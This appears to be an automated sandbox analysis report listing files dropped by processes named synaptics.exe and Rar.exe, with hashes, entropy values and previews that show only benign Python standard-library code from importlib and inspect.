                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1530
                                                                                                                                                                                                                                  Entropy (8bit):5.032152285675819
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zBf0kCRklLM8ZOSIJOmhgP3uSx+uTVMPt/fkWB16RB6lghkChedco/qq6Ddqrqqp:zBf0Xkl4KOSI4mh6px+aqdcWB1cegfhW
                                                                                                                                                                                                                                  MD5:72667F0526E3B68384AB2C81F4593D3D
                                                                                                                                                                                                                                  SHA1:8A0F027B154BF6F6CF05377751AFAD03C0D97058
                                                                                                                                                                                                                                  SHA-256:4BF6441D4015AAF82FB8C99C3CD8111AC10FDD0B6F3CF5BD9993192BB4A4FB22
                                                                                                                                                                                                                                  SHA-512:709E8A7424EDB186BB17EDADAB78BF4776C3766B42FC43D0CAD1AF4824B0268172B377107379A4D5A466CC92DA7A2F5E7C4255D865CBD57A8B5138AB3E75E1DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...AC:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.FreezableDefaul
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3120
                                                                                                                                                                                                                                  Entropy (8bit):5.100576732033481
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:bHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/yk:SoOCDUX4sXwjvMXNpa5f1qoOIk
                                                                                                                                                                                                                                  MD5:0785161A61095FE3E15F29F5D14BE29C
                                                                                                                                                                                                                                  SHA1:1809F8C4D714C567883C8BCBC74567399E552E29
                                                                                                                                                                                                                                  SHA-256:983EA285E9968D6DEE86C7705CF7FA5B7B65EB5C89A1BEA3B74EFF59BEFC1E4F
                                                                                                                                                                                                                                  SHA-512:6DAF6F971232C4EAE1B7A3424B23E5590EDAE6BA9633DE4ABB6F1532AC45FD8F097F81782FEA4C8F25424E1489B6DC5F6271E40ED3FF583A0D31854C7CE540B4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):582
                                                                                                                                                                                                                                  Entropy (8bit):5.176887439871264
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:Cu//48ZPUbmR6OHRgD4gvwfJLV0jyr4eN++2soVzoufN++k+Zqq18:ZDPUe6+k4fJgyESXODlfnZqq18
                                                                                                                                                                                                                                  MD5:BA0FAB1CF9A23A0429497657BBAF02AE
                                                                                                                                                                                                                                  SHA1:DD3FBE9D2F19F1086B22A5F5AB363C9065C731F0
                                                                                                                                                                                                                                  SHA-256:2AD367EF75EF6BC50B1AFA918B8563648B844F7AF206F37FA51B35ED1A471DD2
                                                                                                                                                                                                                                  SHA-512:DD20D970428FF17B58A359B9667BCAED74BCB86ACD49C8FEA38F9AB2A3C1B934AAF23002D12A4EBDD58750556C5F4D3368C3DE958738C8C046672E989DBB3AB2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....?C:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2275
                                                                                                                                                                                                                                  Entropy (8bit):4.727523063114668
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:OgnzBuSda0olUuJpYwj1JEZNmsZBCdHEjX9vlq:OgNuaa0sUAp/j1JErm8BCdHED90
                                                                                                                                                                                                                                  MD5:68FEDBEC5A4CA4E39B49D8A02AAB3E14
                                                                                                                                                                                                                                  SHA1:C4A110F18114985A86790B0080A5034EAB59D3AF
                                                                                                                                                                                                                                  SHA-256:6272FE4EA1D18A4DD9CCC3E1158F02F5DCFB70370DBF7A6BABFE6BAACE107CF8
                                                                                                                                                                                                                                  SHA-512:15631CE11FA206D920748B2646F1631CD85D44B67A422197E97E55381FF29A11D356E6C0EE1334C6825284CE722BD6E97DD18D7839FBDF36CE77724EB2ABE1C9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....:C:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Return all values
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3071
                                                                                                                                                                                                                                  Entropy (8bit):5.061915923845925
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:10RhiYmIWTDvbG12wYRzHiUyOrIuxeQc2zGV4Krj4iOqLigqyiFqYbvHqMHXNVwo:1OhFXWTrbGowYRzHinOrIAeQc2u4KrHG
                                                                                                                                                                                                                                  MD5:653F72D3827582D9B35356A5F47F78D8
                                                                                                                                                                                                                                  SHA1:DA0B336E7004159E623C17529A6C0FF01549C8D9
                                                                                                                                                                                                                                  SHA-256:2BB67B8251F5D65C3E91B1A4BA52F9A878EC048C05AF38569EECD39AFECDF878
                                                                                                                                                                                                                                  SHA-512:EBCB0938569789A2DA195247F942C844D8F873D6DC5CBE9D0582828661DB1DE154B877FD47B595B40247C6C8C40F2553EBBF5E20B3D9A4BA52BFAC48382F00B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1930
                                                                                                                                                                                                                                  Entropy (8bit):4.343405359021804
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:DwGF15jVN5+LjtoIKEuFIw5oGpEnFSy1lkVsqG31WCkG:8mXjX5+uE1Fnl8SWCkG
                                                                                                                                                                                                                                  MD5:A046E808A33BE9907CFC850E6DC30E7D
                                                                                                                                                                                                                                  SHA1:726D08E414D5AC2A7DDF12E61A61FCF1A6BA04DF
                                                                                                                                                                                                                                  SHA-256:863E49569310894ED3F41F966A4883B0FD1684829DDC4E7694A73E083A89112D
                                                                                                                                                                                                                                  SHA-512:4D629301D8208E2CFE7533791188C69BE66B547AF2DE1D6FA53AF64581BC7378FEAA417E1F78629F26E8411C0CA291A937C8C424D7FFCCBEA6D7A28B2B5746C4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import re..import textwrap..import email.message....from ._text import FoldedCase......class Message(email.message.Message):.. multiple_use_keys = set(.. map(.. FoldedCase,.. [.. 'Classifier',.. 'Obsoletes-Dist',.. 'Platform',.. 'Project-URL',.. 'Provides-Dist',.. 'Provides-Extra',.. 'Requires-Dist',.. 'Requires-External',.. 'Supported-Platform',.. 'Dynamic',.. ],.. ).. ).. """.. Keys that may be indicated multiple times per PEP 566... """.... def __new__(cls, orig: email.message.Message):.. res = super().__new__(cls).. vars(res).update(vars(orig)).. return res.... def __init__(self, *args, **kwargs):.. self._headers = self._repair_headers().... # suppress spurious error from mypy.. def __iter__(self):.. return super().__iter__()..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):773
                                                                                                                                                                                                                                  Entropy (8bit):4.707400693185867
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:ysSCg72MrelLMEdrqbM1Mgd5aWqp/IV/MZhmuyNSKtVYCy:ytYlLMZ3y5aWowVEZ8m
                                                                                                                                                                                                                                  MD5:0E214D282C8470C634BBA8872B3DC139
                                                                                                                                                                                                                                  SHA1:98850B764D8FD22830CB9014E2528FE5FE36C315
                                                                                                                                                                                                                                  SHA-256:4281B8DA21C38B837C93E93916D6BBC0A01F7E023C7D39251E3B80250F7D575E
                                                                                                                                                                                                                                  SHA-512:9F024100BFCEA2ABCD2587C97CE0E35B7BF485A972C879883DA99E8F1A4A5931F9A9A2963354AF2389CB46314F1EBF43C09DCC5E30D25790E1470EC6E9539B01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import collections......# from jaraco.collections 3.3..class FreezableDefaultDict(collections.defaultdict):.. """.. Often it is desirable to prevent the mutation of.. a default dict after its initial construction, such.. as to prevent mutation during iteration..... >>> dd = FreezableDefaultDict(list).. >>> dd[0].append('1').. >>> dd.freeze().. >>> dd[1].. [].. >>> len(dd).. 1.. """.... def __missing__(self, key):.. return getattr(self, '_frozen', super().__missing__)(key).... def freeze(self):.. self._frozen = lambda key: self.default_factory()......class Pair(collections.namedtuple('Pair', 'name value')):.. @classmethod.. def parse(cls, text):.. return cls(*map(str.strip, text.split("=", 1)))..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2999
                                                                                                                                                                                                                                  Entropy (8bit):4.6344062686720875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:b8buTGBskHc4SpcJ1lGRGX5GEGuvSpQIgQyAdGnlfsJdSpzTKjJkmSphBlle/RlV:bgst6XJyQIT4bhU5I4NrM3IT4W
                                                                                                                                                                                                                                  MD5:656CF285C9D4FAE91F3F4B02851338D5
                                                                                                                                                                                                                                  SHA1:4F4293F48C7C74C7B0EC949AF3CC526C4F59084B
                                                                                                                                                                                                                                  SHA-256:DA7408563C04CAD511DAEBF9E2A1091AD148DEF11A388437D05B97A5618B881D
                                                                                                                                                                                                                                  SHA-512:453138A2FA3974AD3614842CE0948C439167513ACB18243E76C37449AAB71693600966A014690A0FCB0C246A01D0AFE10CFC269C44C904FF37F88DE197508CB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import types..import functools......# from jaraco.functools 3.3..def method_cache(method, cache_wrapper=None):.. """.. Wrap lru_cache to support storing the cache data in the object instances..... Abstracts the common paradigm where the method explicitly saves an.. underscore-prefixed protected property on first call and returns that.. subsequently..... >>> class MyClass:.. ... calls = 0.. ..... ... @method_cache.. ... def method(self, value):.. ... self.calls += 1.. ... return value.... >>> a = MyClass().. >>> a.method(3).. 3.. >>> for x in range(75):.. ... res = a.method(x).. >>> a.calls.. 75.... Note that the apparent behavior will be exactly like that of lru_cache.. except that the cache is stored on each instance, so values in one.. instance will not flush values from another, and when an instance is.. deleted, so are the cached values for that instance..... >>> b = MyClass()..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):626
                                                                                                                                                                                                                                  Entropy (8bit):4.225594095287608
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:19uQ6NyMeKuDRJLV0jyT0V9pEoQsRXGeFWKgOJALe8XWGJ:19uHdxWJgyTQ/EeRXGaWzNLe8tJ
                                                                                                                                                                                                                                  MD5:07DBBC13A3B5D33F9F06FB6D0FCF07D7
                                                                                                                                                                                                                                  SHA1:6C4B8BBDA2B067E3FB502202494CA772312203D7
                                                                                                                                                                                                                                  SHA-256:8E3C80F7BDB8A3FBB6E0373489C150CE0F0767D79DD829A0662903CA1010049B
                                                                                                                                                                                                                                  SHA-512:F0934CD582BCA775CF413BEBA56BC50823A2BB2C32D252AE36AD6568B97DB268FB0FE993982381648FBD03AFF7B9055097D56828702B9D4EA4F51D2AD179BAB8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from itertools import filterfalse......def unique_everseen(iterable, key=None):.. "List unique elements, preserving order. Remember all elements ever seen.".. # unique_everseen('AAAABBBCCDAABBB') --> A B C D.. # unique_everseen('ABBCcAD', str.lower) --> A B C D.. seen = set().. seen_add = seen.add.. if key is None:.. for element in filterfalse(seen.__contains__, iterable):.. seen_add(element).. yield element.. else:.. for element in iterable:.. k = key(element).. if k not in seen:.. seen_add(k).. yield element..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1177
                                                                                                                                                                                                                                  Entropy (8bit):4.6714418925368735
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RE8HI89tYIWOtGFK4BWYvcqjVFi20zGhH:/Z9aIrtAK4gec2/0zGl
                                                                                                                                                                                                                                  MD5:EADE85F75510D406899FFA83EB10364B
                                                                                                                                                                                                                                  SHA1:03019F6300B3950090809E6C53D68B51C565165F
                                                                                                                                                                                                                                  SHA-256:D350F8C337081981259C3D18B292116194D8DF095C7F403EEF0EEE0D52E30166
                                                                                                                                                                                                                                  SHA-512:DB1210420A3A99A4DD5E610B1D36C59809F4D7811D7DA0944BAD43CB4F82326384C98CFFCC361084D54CFF7A07D031374EF30B04BA056249AE6E91A7EE9051B5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Any, Dict, Iterator, List, Protocol, TypeVar, Union......_T = TypeVar("_T")......class PackageMetadata(Protocol):.. def __len__(self) -> int:.. ... # pragma: no cover.... def __contains__(self, item: str) -> bool:.. ... # pragma: no cover.... def __getitem__(self, key: str) -> str:.. ... # pragma: no cover.... def __iter__(self) -> Iterator[str]:.. ... # pragma: no cover.... def get_all(self, name: str, failobj: _T = ...) -> Union[List[Any], _T]:.. """.. Return all values associated with a possibly multi-valued key... """.... @property.. def json(self) -> Dict[str, Union[str, List[str]]]:.. """.. A JSON-compatible form of the metadata... """......class SimplePath(Protocol):.. """.. A minimal subset of pathlib.Path required by PathDistribution... """.... def joinpath(self) -> 'SimplePath':.. ... # pragma: no cover.... def __div__(self) -> 'SimplePath':
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2297
                                                                                                                                                                                                                                  Entropy (8bit):4.6525371068604136
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:BUu/H8O42w9/2kz8/WVy1wux7QcY5Djwa7TrbjmfVbp5bWYLE7faS5E4wz0u3v:BUM8O1w9/2kz8/W41wA7QcenFqVp3v
                                                                                                                                                                                                                                  MD5:A6554E82888F65E2D55C209B7FD9125C
                                                                                                                                                                                                                                  SHA1:B4868D5C4861262B0B4394606D72DE2BF72913CA
                                                                                                                                                                                                                                  SHA-256:87B52AB0F393B60FE5D9BFDB0A019A18395B0A127D133847763A873D5D1F68DB
                                                                                                                                                                                                                                  SHA-512:FC7ACCDB79B99AFFA43127AB7711CBA18A9D735A14975FD1D2D05168D50C2282112D0E08CD2BF8AA58DD0F07A0D1FEA2967F4641ADD5E3D96988A898E75B779A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import re....from ._functools import method_cache......# from jaraco.text 3.5..class FoldedCase(str):.. """.. A case insensitive string class; behaves just like str.. except compares equal when the only variation is case..... >>> s = FoldedCase('hello world').... >>> s == 'Hello World'.. True.... >>> 'Hello World' == s.. True.... >>> s != 'Hello World'.. False.... >>> s.index('O').. 4.... >>> s.split('O').. ['hell', ' w', 'rld'].... >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])).. ['alpha', 'Beta', 'GAMMA'].... Sequence membership is straightforward..... >>> "Hello World" in [s].. True.. >>> s in ["Hello World"].. True.... You may test for set inclusion, but candidate and elements.. must both be folded..... >>> FoldedCase("Hello World") in {s}.. True.. >>> s in {FoldedCase("Hello World")}.. True.... String inclusion works as long as the FoldedCase object.. is on the right..... >>> "hello"
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3710
                                                                                                                                                                                                                                  Entropy (8bit):4.50184813832295
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:dQTYLJ6HsxJyXmiq3YY2ZLsr4B/f0fFvQQ0txuJ/anYG+8rzYZeZzDrJeSHsv:dQTSJI0J8miCYt5sr4d8NvQ2CrZrJeAi
                                                                                                                                                                                                                                  MD5:1DF7A85C79AB990FF6C103B011A7E3F6
                                                                                                                                                                                                                                  SHA1:BC301AEA53C43DFD4992A91B186F341B8EFAD364
                                                                                                                                                                                                                                  SHA-256:DFF87F82CF85D623B847DB323E6B202B96EB0081DD38C3FEC105501F61E76644
                                                                                                                                                                                                                                  SHA-512:0162DF97A485B31004EB30B7F5A7B4BCD21EEFC629F1F074BC95BD0BCF2F17119162B5B0A31DF989022606B8B223888E26A5C93D985F47287AE25DEEC51B7851
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import collections..import zipfile..import pathlib..from . import abc......def remove_duplicates(items):.. return iter(collections.OrderedDict.fromkeys(items))......class FileReader(abc.TraversableResources):.. def __init__(self, loader):.. self.path = pathlib.Path(loader.path).parent.... def resource_path(self, resource):.. """.. Return the file system path to prevent.. `resources.path()` from creating a temporary.. copy... """.. return str(self.path.joinpath(resource)).... def files(self):.. return self.path......class ZipReader(abc.TraversableResources):.. def __init__(self, loader, module):.. _, _, name = module.rpartition('.').. self.prefix = loader.prefix.replace('\\', '/') + name + '/'.. self.archive = loader.archive.... def open_resource(self, resource):.. try:.. return super().open_resource(resource).. except KeyError as exc:.. raise FileNotFoundEr
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5890
                                                                                                                                                                                                                                  Entropy (8bit):4.644653304355339
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4l35Yo7C0GS2p0Wnnj5qZM3Qeudi7ulaGmVXluXkkoVfpo/AHakVEOa1mqPfySFo:Nwdrl4PuQFnXWO8m6yS8RNNVRWamKmHu
                                                                                                                                                                                                                                  MD5:D24BF8D3E22BE65665C6B3D52722B4A7
                                                                                                                                                                                                                                  SHA1:D13D69A159B6B7C13AFC323C1F03732E14BF7BC6
                                                                                                                                                                                                                                  SHA-256:5EF2C3E328392BFC4E0CFCE2D2E958DFDD0B77D8C28AB9FA3DB2B615D14E933B
                                                                                                                                                                                                                                  SHA-512:9F3594CC4C45BF4EF92645CDC5C1278AA7CA911B34A1556CEEA7A9A7740C3405C111CC78ECD4B55FBB893BC0B984F4A71F24596CBBFF6C78EE58660D91014C7E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import io....from . import _common..from ._common import as_file, files..from .abc import ResourceReader..from contextlib import suppress..from importlib.abc import ResourceLoader..from importlib.machinery import ModuleSpec..from io import BytesIO, TextIOWrapper..from pathlib import Path..from types import ModuleType..from typing import ContextManager, Iterable, Union..from typing import cast..from typing.io import BinaryIO, TextIO..from collections.abc import Sequence..from functools import singledispatch......__all__ = [.. 'Package',.. 'Resource',.. 'ResourceReader',.. 'as_file',.. 'contents',.. 'files',.. 'is_resource',.. 'open_binary',.. 'open_text',.. 'path',.. 'read_binary',.. 'read_text',..]......Package = Union[str, ModuleType]..Resource = Union[str, os.PathLike]......def open_binary(package: Package, resource: Resource) -> BinaryIO:.. """Return a file-like object opened for binary reading of the resource.""".. resource = _co
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11789
                                                                                                                                                                                                                                  Entropy (8bit):4.482128155113969
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:GKdRi99RbmAOewx9ifK/steJyqqowIoaY23XX10C8zCNQy7GE7GtXkDMbzq:GKji9DbmAOec9iUJct23ozCNQydbMq
                                                                                                                                                                                                                                  MD5:2B78D189CD0CB5B765B9F19AC18DCE5B
                                                                                                                                                                                                                                  SHA1:B61170AB37D283DB0CE4FA9918C8ADEABD98754D
                                                                                                                                                                                                                                  SHA-256:B9A599E9047040EC13892BF784BE3C733E5A2D8EFF39331EF66CFBADD6B169CD
                                                                                                                                                                                                                                  SHA-512:FE4D475A40C1F19C07A0FB811D3A823C50F654F8E9E57C119EAAE03D05CC40BE4A01EB1DFEC9CEFE2FBF9919BBF30BBDB68C07896A271DFB1DB757BDC22CBEAE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utility code for constructing importers, etc."""..from ._abc import Loader..from ._bootstrap import module_from_spec..from ._bootstrap import _resolve_name..from ._bootstrap import spec_from_loader..from ._bootstrap import _find_spec..from ._bootstrap_external import MAGIC_NUMBER..from ._bootstrap_external import _RAW_MAGIC_NUMBER..from ._bootstrap_external import cache_from_source..from ._bootstrap_external import decode_source..from ._bootstrap_external import source_from_cache..from ._bootstrap_external import spec_from_file_location....from contextlib import contextmanager..import _imp..import functools..import sys..import types..import warnings......def source_hash(source_bytes):.. "Return the hash of *source_bytes* as used in hash-based pyc files.".. return _imp.source_hash(_RAW_MAGIC_NUMBER, source_bytes)......def resolve_name(name, package):.. """Resolve a relative module name to an absolute one.""".. if not name.startswith('.'):.. return name.. elif no
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):127695
                                                                                                                                                                                                                                  Entropy (8bit):4.505858957237594
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:TbCpSW3YOJ9jRCocEM8+8DAE8ikcLBbjxXgqS7GjQ4XpQrCp:TupSW399jIocEn+AA3iTbj2qIGjfXpCE
                                                                                                                                                                                                                                  MD5:85AB7DDA08A01A01AF22D1D84EFF412A
                                                                                                                                                                                                                                  SHA1:BDDF7F923E6D7FE75F91776B783EDDEAE6B890F9
                                                                                                                                                                                                                                  SHA-256:A9340ED8296AA4C38DEF7E69A1236A866C2F1D85C59FD48D788CAC85BD095401
                                                                                                                                                                                                                                  SHA-512:A23C4044EF631EC616CBDD4931B1FE15A4F868AF974624E83F13B0F897C42D42421B3C0E61FFCF93A6633626762FED8E4BEA6E56F2E5A3D34C9566BE3E38E6F4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Get useful information from live Python objects.....This module encapsulates the interface provided by the internal special..attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion...It also provides some help for examining source code and class layout.....Here are some of the useful functions provided by this module:.... ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),.. isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),.. isroutine() - check object types.. getmembers() - get members of an object that satisfy a given condition.... getfile(), getsourcefile(), getsource() - find an object's source code.. getdoc(), getcomments() - get documentation on an object.. getmodule() - determine the module that an object came from.. getclasstree() - arrange classes so as to represent their hierarchy.... getargvalues(), getcallargs() - get info about function arguments.. getfullargspec() - same, with support for Pytho
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4310
                                                                                                                                                                                                                                  Entropy (8bit):4.893348499094317
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pKFiCaQLDyrpVfnmlaypyvRbfnI+ad3GpcmvItakagjUgXgBagO:dCJDo/U9yJL0d3GtojXQB9O
                                                                                                                                                                                                                                  MD5:99710B1A7D4045B9334F8FC11B084A40
                                                                                                                                                                                                                                  SHA1:7032FACDE0106F7657F25FB1A80C3292F84EC394
                                                                                                                                                                                                                                  SHA-256:FE91B067FD544381FCD4F3DF53272C8C40885C1811AC2165FD6686623261BC5D
                                                                                                                                                                                                                                  SHA-512:AC1B4562ED507BCCCC2BDFD8CAB6872A37C081BE4D5398BA1471D84498C322DCAA176EB1DDA23DAADDD4CEBFCD820B319DDCB33C3972EBF34B32393AD8BD0412
                                                                                                                                                                                                                                  Malicious:false
